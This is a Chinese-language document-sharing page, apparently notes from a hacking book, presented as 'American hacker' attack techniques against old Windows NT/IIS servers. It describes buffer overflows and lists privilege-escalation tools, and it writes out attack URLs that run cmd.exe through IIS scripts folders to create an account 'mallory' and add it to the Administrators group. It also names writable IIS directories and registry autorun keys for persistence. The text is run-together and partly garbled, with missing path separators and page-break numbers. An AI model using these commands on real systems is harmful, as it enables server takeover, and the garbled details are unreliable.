资源描述:
《美国 超级 黑客 技术》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁等人打開來這些初等或中等的攻擊法嗎??美國駭客的實力真是另人無法想像,他們只需利用網址就能輕而意舉的主動攻擊了,情結不輸給電影,我們的手法對他們而言只是無須大驚小怪的小兒科......參考書為黑紅色的網路駭客與系統安全(好像有新版的,小皇是舊版的,名稱與外關差不多)書籍上的重點,作者是美國著名的網路安全專家,遠端緩衝區溢滿{bufferoverflow}緩衝區溢滿是發生在程式沒有適當的檢查輸入內容的長度,而導致緩衝區空間不足,因此,任何預期之外的輸入,就會掩蓋
2、掉CPU執行堆疊的其它部分.遠端執行命令取得系統管理者權限http://www.infowar.co.uk/mnemonix遠端執行一個批次檔執行任意的程式http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htmISSHACKhttp://www.eeye.com在NTISS網頁伺服器上執行程式碼在本機中可以給使一位使用者加入到區域的管理者群組中的擴權程式http://www.ntsecurity.net/security/getadmin.htm有相似功能的其它程式sechole升級版是sec
3、holedhttp://www.ntsecurity.net/security/sechole.htm(DomainAdmingroup)網域管理者(升級)群組cmd.exeNT命令解釋器ntuser程式用來修改使用者,群組和政策的程式,可參考http://www.pedestalsoftware.comSechole的啟動可靠在一個瀏覽器輸入一個適當的URL連網目標系統,例如下列我們將Sechole上傳至/W3SVC/1/ROOT/SCRIPTS(這裡就是C:inetpubSCRIPTS)然後用下面的URL網址啟動它http://192.1
4、68.202.154/scripts/secholle.exe這樣做會成功的將IUSR_machine_name帳號加入管理者群組中,我們並沒有IUSR的密碼,因此我們為了要避免登入IUSR,通常是在目標系統上開個帳號,做法是利用ntuser公用程式透過瀏覽器執行下列複雜的URL(為了方便閱讀內容經過裝飾)http://192.168.202.154/scripts/cmd.exe?/c%20c:C:inetpubscriptstuser.exe%20-s%20corpl%20add%20mallory%20-password%20se
5、cret以上%20再網語中是空白的意思,所以以上網址會被執行為(cmd/c會送出ntuser命令到shell,在完成時終結自己)cmd/cntuser-sadd-password第7頁,共7頁以上我們是以corpl做伺服機名稱,mallory是使用者名稱,secret當密碼,用類似的URL攻擊者可以用ntuser幫你把mallory加到管理者群組裡,如下(LORGUP是指某個區域群組)cmd/cntuser-sLORGUPAPPEND6、sername>...http://192.168.202.154/scripts/cmd.exe?/c%20c:C:inetpubscriptstuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory同機能的批次檔寫法如registry,cmd內容:netlocalgroupadministrators/add安全系統ISS目錄和一些潛在可行的目錄http://www.iss.net/xforce/alerts/advise6.html以下/W3SVC/1/ROO
7、T通常是指C:Inetpub還有News及Mail/W3SVC/1/ROOT/msade/W3SVC/1/ROOT/cgi-bin/W3SVC/1/ROOT/SCRIPTS/W3SVC/1/ROOT/ISSADMPWD/W3SVC/1/ROOT/_vti_bin/W3SVC/1/ROOT/_vti_bin/_vti_adm/W3SVC/1/ROOT/_vti_bin/_vti_aut(_vti_bin都是安裝FrontPage之後衍生出來的)放批次檔的地方HKLMsoftwareMicrosoftCurrentVersionRUN[a
8、ny]AeDebugDebuggerWinLogonUserinit--------------------------------